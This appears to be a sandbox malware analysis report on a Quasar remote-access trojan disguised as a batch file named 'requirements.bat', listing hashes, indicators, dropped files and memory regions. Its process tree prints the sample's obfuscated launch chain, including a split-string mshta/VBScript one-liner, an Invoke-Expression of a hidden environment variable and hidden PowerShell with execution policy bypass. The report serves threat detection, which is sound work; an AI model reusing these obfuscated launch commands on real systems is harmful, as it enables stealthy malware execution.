quasar | d1d5f8c21e7111ca5a3a03d0fc6fed418af963d49b24980e1730057a5e5e8745

Analysis

max time kernel
29s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
29/03/2024, 00:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dhm/requirements.bat
Size

15.5MB
MD5

60c6f3b002d9bc81aa993566ed1d4daf
SHA1

8b801703fe6e418cf59b50a46c21bf79b104ee8e
SHA256

a53d1740f3c14be4608db28590ef26264975d13d4cb7ff4fc823a3107798cf42
SHA512

9b2cb3ba41c21023453fff0a29b1dbd534ab87a6af1255fd5bd6e521bbacf617355dc17592f8b876e4d340494df1ef9efe268c6276d654f74ad2888e7d9df319
SSDEEP

49152:ttG1Kmdh/bGIPKdMdGB52bc0MIoW8mN+aNahOJDZQevDR+SEOzjm9d+SpUNKbkVq:P

Score

10^/10

quasar spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
3000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral5/memory/3324-90-0x0000027BFC830000-0x0000027BFCFDE000-memory.dmp	family_quasar

Deletes itself 1 IoCs

pid	Process
4228	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
4544	$sxr-mshta.exe
924	$sxr-cmd.exe
3324	$sxr-powershell.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\$sxr-cmd.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-cmd.exe	powershell.exe
File created	C:\Windows\$sxr-powershell.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	powershell.exe
File created	C:\Windows\$sxr-mshta.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	$sxr-mshta.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
4228	powershell.exe
4228	powershell.exe
4228	powershell.exe
4228	powershell.exe
4228	powershell.exe
4228	powershell.exe
3324	$sxr-powershell.exe
3324	$sxr-powershell.exe
3324	$sxr-powershell.exe
3324	$sxr-powershell.exe
3324	$sxr-powershell.exe
3324	$sxr-powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	3324	$sxr-powershell.exe
Token: SeDebugPrivilege	3324	$sxr-powershell.exe
Token: SeDebugPrivilege	3324	$sxr-powershell.exe

Suspicious use of WriteProcessMemory 60 IoCs

description	pid	Process	procid_target
PID 396 wrote to memory of 1472	396	cmd.exe	79
PID 396 wrote to memory of 1472	396	cmd.exe	79
PID 396 wrote to memory of 4228	396	cmd.exe	80
PID 396 wrote to memory of 4228	396	cmd.exe	80
PID 4544 wrote to memory of 924	4544	$sxr-mshta.exe	83
PID 4544 wrote to memory of 924	4544	$sxr-mshta.exe	83
PID 924 wrote to memory of 1968	924	$sxr-cmd.exe	85
PID 924 wrote to memory of 1968	924	$sxr-cmd.exe	85
PID 924 wrote to memory of 3324	924	$sxr-cmd.exe	86
PID 924 wrote to memory of 3324	924	$sxr-cmd.exe	86
PID 3324 wrote to memory of 680	3324	$sxr-powershell.exe	7
PID 3324 wrote to memory of 680	3324	$sxr-powershell.exe	7
PID 3324 wrote to memory of 988	3324	$sxr-powershell.exe	12
PID 3324 wrote to memory of 988	3324	$sxr-powershell.exe	12
PID 3324 wrote to memory of 452	3324	$sxr-powershell.exe	14
PID 3324 wrote to memory of 452	3324	$sxr-powershell.exe	14
PID 3324 wrote to memory of 704	3324	$sxr-powershell.exe	15
PID 3324 wrote to memory of 704	3324	$sxr-powershell.exe	15
PID 3324 wrote to memory of 1044	3324	$sxr-powershell.exe	16
PID 3324 wrote to memory of 1044	3324	$sxr-powershell.exe	16
PID 3324 wrote to memory of 1080	3324	$sxr-powershell.exe	17
PID 3324 wrote to memory of 1080	3324	$sxr-powershell.exe	17
PID 3324 wrote to memory of 1196	3324	$sxr-powershell.exe	19
PID 3324 wrote to memory of 1196	3324	$sxr-powershell.exe	19
PID 3324 wrote to memory of 1216	3324	$sxr-powershell.exe	20
PID 3324 wrote to memory of 1216	3324	$sxr-powershell.exe	20
PID 3324 wrote to memory of 1284	3324	$sxr-powershell.exe	21
PID 3324 wrote to memory of 1284	3324	$sxr-powershell.exe	21
PID 3324 wrote to memory of 1304	3324	$sxr-powershell.exe	22
PID 3324 wrote to memory of 1304	3324	$sxr-powershell.exe	22
PID 3324 wrote to memory of 1364	3324	$sxr-powershell.exe	23
PID 3324 wrote to memory of 1364	3324	$sxr-powershell.exe	23
PID 3324 wrote to memory of 1464	3324	$sxr-powershell.exe	24
PID 3324 wrote to memory of 1464	3324	$sxr-powershell.exe	24
PID 3324 wrote to memory of 1532	3324	$sxr-powershell.exe	25
PID 3324 wrote to memory of 1532	3324	$sxr-powershell.exe	25
PID 3324 wrote to memory of 1624	3324	$sxr-powershell.exe	26
PID 3324 wrote to memory of 1624	3324	$sxr-powershell.exe	26
PID 3324 wrote to memory of 1632	3324	$sxr-powershell.exe	27
PID 3324 wrote to memory of 1632	3324	$sxr-powershell.exe	27
PID 3324 wrote to memory of 1660	3324	$sxr-powershell.exe	28
PID 3324 wrote to memory of 1660	3324	$sxr-powershell.exe	28
PID 3324 wrote to memory of 1732	3324	$sxr-powershell.exe	29
PID 3324 wrote to memory of 1732	3324	$sxr-powershell.exe	29
PID 3324 wrote to memory of 1784	3324	$sxr-powershell.exe	30
PID 3324 wrote to memory of 1784	3324	$sxr-powershell.exe	30
PID 3324 wrote to memory of 1844	3324	$sxr-powershell.exe	31
PID 3324 wrote to memory of 1844	3324	$sxr-powershell.exe	31
PID 3324 wrote to memory of 1880	3324	$sxr-powershell.exe	32
PID 3324 wrote to memory of 1880	3324	$sxr-powershell.exe	32
PID 3324 wrote to memory of 1940	3324	$sxr-powershell.exe	33
PID 3324 wrote to memory of 1940	3324	$sxr-powershell.exe	33
PID 3324 wrote to memory of 1948	3324	$sxr-powershell.exe	34
PID 3324 wrote to memory of 1948	3324	$sxr-powershell.exe	34
PID 3324 wrote to memory of 2040	3324	$sxr-powershell.exe	35
PID 3324 wrote to memory of 2040	3324	$sxr-powershell.exe	35
PID 3324 wrote to memory of 1152	3324	$sxr-powershell.exe	36
PID 3324 wrote to memory of 1152	3324	$sxr-powershell.exe	36
PID 3324 wrote to memory of 2088	3324	$sxr-powershell.exe	37
PID 3324 wrote to memory of 2088	3324	$sxr-powershell.exe	37

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:452

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1196
- C:\Windows\$sxr-mshta.exe
  C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-bsdNZbmfOhwdBQEAEjRQ4312:GWhOVoSS=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4544
- - C:\Windows\$sxr-cmd.exe
    "C:\Windows\$sxr-cmd.exe" /c %$sxr-bsdNZbmfOhwdBQEAEjRQ4312:GWhOVoSS=%
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:924
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:lzNxgZnUMx; "
      4⤵
      PID:1968
  - - C:\Windows\$sxr-powershell.exe
      C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1216

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1464

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1624

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1844

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1880

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1948

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1152

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dhm\requirements.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:qRLHzJZDJQ; "
  2⤵
  PID:1472
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
  2⤵
  - Deletes itself
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4228

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
62KB

MD5
e566632d8956997225be604d026c9b39

SHA1
94a9aade75fffc63ed71404b630eca41d3ce130e

SHA256
b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

SHA512
f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sruyguex.u0c.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\$sxr-cmd.exe

Filesize
324KB

MD5
c5db7b712f280c3ae4f731ad7d5ea171

SHA1
e8717ff0d40e01fd3b06de2aa5a401bed1c907cc

SHA256
f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba

SHA512
bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

Download Submit
C:\Windows\$sxr-mshta.exe

Filesize
32KB

MD5
356e04e106f6987a19938df67dea0b76

SHA1
f2fd7cde5f97427e497dfb07b7f682149dc896fb

SHA256
4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e

SHA512
df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd

Download Submit
C:\Windows\$sxr-powershell.exe

Filesize
440KB

MD5
0e9ccd796e251916133392539572a374

SHA1
eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

SHA256
c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

SHA512
e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

Download Submit
memory/452-149-0x0000020565180000-0x00000205651A9000-memory.dmp

Filesize
164KB

Download
memory/452-148-0x0000020565180000-0x00000205651A9000-memory.dmp

Filesize
164KB

Download
memory/452-147-0x00007FF810EF0000-0x00007FF810F00000-memory.dmp

Filesize
64KB

Download
memory/452-139-0x0000020565180000-0x00000205651A9000-memory.dmp

Filesize
164KB

Download
memory/680-106-0x000001AB8B8C0000-0x000001AB8B8E9000-memory.dmp

Filesize
164KB

Download
memory/680-130-0x000001AB8B8C0000-0x000001AB8B8E9000-memory.dmp

Filesize
164KB

Download
memory/680-125-0x00007FF810EF0000-0x00007FF810F00000-memory.dmp

Filesize
64KB

Download
memory/680-129-0x00007FF850F04000-0x00007FF850F05000-memory.dmp

Filesize
4KB

Download
memory/680-104-0x000001AB8B880000-0x000001AB8B8A3000-memory.dmp

Filesize
140KB

Download
memory/680-105-0x000001AB8B8C0000-0x000001AB8B8E9000-memory.dmp

Filesize
164KB

Download
memory/680-126-0x000001AB8B8C0000-0x000001AB8B8E9000-memory.dmp

Filesize
164KB

Download
memory/704-154-0x0000022073460000-0x0000022073489000-memory.dmp

Filesize
164KB

Download
memory/988-134-0x0000023A27500000-0x0000023A27529000-memory.dmp

Filesize
164KB

Download
memory/988-132-0x00007FF810EF0000-0x00007FF810F00000-memory.dmp

Filesize
64KB

Download
memory/988-115-0x0000023A27500000-0x0000023A27529000-memory.dmp

Filesize
164KB

Download
memory/988-135-0x0000023A27500000-0x0000023A27529000-memory.dmp

Filesize
164KB

Download
memory/3324-97-0x0000027BFDE40000-0x0000027BFDE82000-memory.dmp

Filesize
264KB

Download
memory/3324-114-0x0000027BF26F0000-0x0000027BF2700000-memory.dmp

Filesize
64KB

Download
memory/3324-166-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/3324-151-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/3324-127-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/3324-108-0x00007FF830000000-0x00007FF830AC2000-memory.dmp

Filesize
10.8MB

Download
memory/3324-109-0x0000027BF26F0000-0x0000027BF2700000-memory.dmp

Filesize
64KB

Download
memory/3324-101-0x0000000180000000-0x0000000180007000-memory.dmp

Filesize
28KB

Download
memory/3324-96-0x0000027BFD820000-0x0000027BFD88A000-memory.dmp

Filesize
424KB

Download
memory/3324-92-0x0000027BFD370000-0x0000027BFD422000-memory.dmp

Filesize
712KB

Download
memory/3324-91-0x0000027BFCFE0000-0x0000027BFD36C000-memory.dmp

Filesize
3.5MB

Download
memory/3324-90-0x0000027BFC830000-0x0000027BFCFDE000-memory.dmp

Filesize
7.7MB

Download
memory/3324-89-0x0000027BFC2E0000-0x0000027BFC82E000-memory.dmp

Filesize
5.3MB

Download
memory/3324-88-0x0000027BF2DF0000-0x0000027BF2DF6000-memory.dmp

Filesize
24KB

Download
memory/3324-87-0x0000027BF2A60000-0x0000027BF2A66000-memory.dmp

Filesize
24KB

Download
memory/3324-86-0x0000027BF26D0000-0x0000027BF26F2000-memory.dmp

Filesize
136KB

Download
memory/3324-85-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/3324-84-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/3324-83-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/3324-82-0x00007FF84F3A0000-0x00007FF84F45D000-memory.dmp

Filesize
756KB

Download
memory/3324-62-0x00007FF830000000-0x00007FF830AC2000-memory.dmp

Filesize
10.8MB

Download
memory/3324-68-0x0000027BF26F0000-0x0000027BF2700000-memory.dmp

Filesize
64KB

Download
memory/3324-69-0x0000027BF26F0000-0x0000027BF2700000-memory.dmp

Filesize
64KB

Download
memory/3324-81-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/3324-80-0x0000027BFB740000-0x0000027BFBE28000-memory.dmp

Filesize
6.9MB

Download
memory/3324-76-0x0000027BFB090000-0x0000027BFB736000-memory.dmp

Filesize
6.6MB

Download
memory/3324-79-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/3324-78-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/4228-24-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/4228-23-0x0000023154FE0000-0x0000023154FF0000-memory.dmp

Filesize
64KB

Download
memory/4228-73-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/4228-27-0x000002316D7E0000-0x000002316D7E6000-memory.dmp

Filesize
24KB

Download
memory/4228-28-0x0000023177540000-0x000002317759E000-memory.dmp

Filesize
376KB

Download
memory/4228-29-0x00000231775A0000-0x00000231775F8000-memory.dmp

Filesize
352KB

Download
memory/4228-54-0x00007FF82F778000-0x00007FF82F779000-memory.dmp

Filesize
4KB

Download
memory/4228-49-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/4228-46-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/4228-43-0x0000000180000000-0x0000000180007000-memory.dmp

Filesize
28KB

Download
memory/4228-42-0x000002316D800000-0x000002316D808000-memory.dmp

Filesize
32KB

Download
memory/4228-40-0x00007FF683B50000-0x00007FF683BBE000-memory.dmp

Filesize
440KB

Download
memory/4228-39-0x0000023154FE0000-0x0000023154FF0000-memory.dmp

Filesize
64KB

Download
memory/4228-38-0x00000231783C0000-0x00000231783EE000-memory.dmp

Filesize
184KB

Download
memory/4228-94-0x00007FF830000000-0x00007FF830AC2000-memory.dmp

Filesize
10.8MB

Download
memory/4228-95-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/4228-37-0x0000023178360000-0x00000231783B8000-memory.dmp

Filesize
352KB

Download
memory/4228-8-0x000002316D3B0000-0x000002316D3D2000-memory.dmp

Filesize
136KB

Download
memory/4228-36-0x0000023178320000-0x0000023178356000-memory.dmp

Filesize
216KB

Download
memory/4228-25-0x0000023177440000-0x000002317753C000-memory.dmp

Filesize
1008KB

Download
memory/4228-26-0x000002316D5A0000-0x000002316D5C2000-memory.dmp

Filesize
136KB

Download
memory/4228-35-0x0000023178270000-0x0000023178322000-memory.dmp

Filesize
712KB

Download
memory/4228-77-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/4228-34-0x0000023177640000-0x000002317826C000-memory.dmp

Filesize
12.2MB

Download
memory/4228-22-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/4228-30-0x0000023155070000-0x0000023155076000-memory.dmp

Filesize
24KB

Download
memory/4228-21-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/4228-33-0x0000023177600000-0x000002317763E000-memory.dmp

Filesize
248KB

Download
memory/4228-20-0x00007FF830000000-0x00007FF830AC2000-memory.dmp

Filesize
10.8MB

Download
memory/4228-19-0x00007FF84F3A0000-0x00007FF84F45D000-memory.dmp

Filesize
756KB

Download
memory/4228-17-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/4228-16-0x0000023176640000-0x000002317712C000-memory.dmp

Filesize
10.9MB

Download
memory/4228-15-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/4228-14-0x00007FF850E60000-0x00007FF851069000-memory.dmp

Filesize
2.0MB

Download
memory/4228-13-0x0000023175B90000-0x000002317663C000-memory.dmp

Filesize
10.7MB

Download
memory/4228-12-0x000002316D820000-0x000002316D866000-memory.dmp

Filesize
280KB

Download
memory/4228-11-0x0000023154FE0000-0x0000023154FF0000-memory.dmp

Filesize
64KB

Download
memory/4228-10-0x0000023154FE0000-0x0000023154FF0000-memory.dmp

Filesize
64KB

Download
memory/4228-32-0x000002316D7D0000-0x000002316D7D6000-memory.dmp

Filesize
24KB

Download
memory/4228-9-0x00007FF830000000-0x00007FF830AC2000-memory.dmp

Filesize
10.8MB

Download
memory/4228-31-0x000002316D7F0000-0x000002316D7F8000-memory.dmp

Filesize
32KB

Download